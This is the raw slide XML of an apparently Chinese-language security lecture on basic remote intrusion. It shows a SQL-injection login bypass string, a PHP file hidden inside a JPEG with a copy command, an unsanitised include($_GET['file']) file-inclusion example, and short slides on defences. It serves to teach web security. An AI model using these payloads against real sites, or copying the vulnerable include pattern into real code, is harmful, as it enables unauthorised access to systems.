              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where user='admin' and pass='1' or 'a'='a'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3637868268"/>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6954AAA6-F167-49E0-8805-B817A6874353}"/>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774F6DE4-4836-4B91-93AB-874F2CEA9497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更多方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>select * from users where  user='&amp;username&amp;' and pass='&amp;password&amp;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where user='admin' and pass='1' or 'a'=‘a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何防御？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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74CD419E-1A75-48C5-98AE-415A6222A096}"/>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FD4E4FEF-45A4-45FD-9847-9EE62718EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>写一个恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>代码文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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5D075516-C8AD-4048-A226-7816C51A3E83}"/>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5832A3EF-BA66-42D0-957E-1FBD756D3E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>将恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>代码文件隐藏在图片中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>copy 1.jpg/b + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>/a 2.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644A5B93-BEC4-460B-9F7E-625A43AFF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4292600"/>
            <a:ext cx="71278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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D08909A5-BE0D-4640-B460-E61724BEF4B6}"/>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298ED97B-B5D9-45BE-8726-3CBA8C6D02F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>copy 1.jpg/b + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>/a 2.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55300" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB156EC-30D1-4D02-B609-9EDEF03B9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05263"/>
            <a:ext cx="9144000"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71664880-0303-458A-A5A3-DC84EF91C2B1}"/>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63CE24EC-362A-4A26-B298-53126610E175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>上传并访问图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>服务器文本包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </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07256C92-34BE-474F-817B-5625DE51C28E}"/>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3724823F-7380-4F6E-9619-C80FBADEF31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>$file = $_GET['file'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>include $file;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>?&gt;	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59396" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A3C185-D167-48A8-8DBB-4D3F7FC78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5526088"/>
            <a:ext cx="88201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07256C92-34BE-474F-817B-5625DE51C28E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程入侵的基本方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3724823F-7380-4F6E-9619-C80FBADEF31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>如何防御文件上传漏洞？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查文件后缀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查文件内容（正则表达式匹配）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>根据用户图片生成新的图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38841178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71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7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54A9160-CDBE-456D-92ED-C7AE6E4D4836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>问题引入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C128966F-E665-4F8C-AC4A-696DBE43EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863516" y="3789040"/>
            <a:ext cx="4211960" cy="720080"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可行不可行？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF3824BC-F4E3-45A8-8A3C-DF459465F1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132856"/>
            <a:ext cx="4392488" cy="4320480"/>
          </a:xfrm>
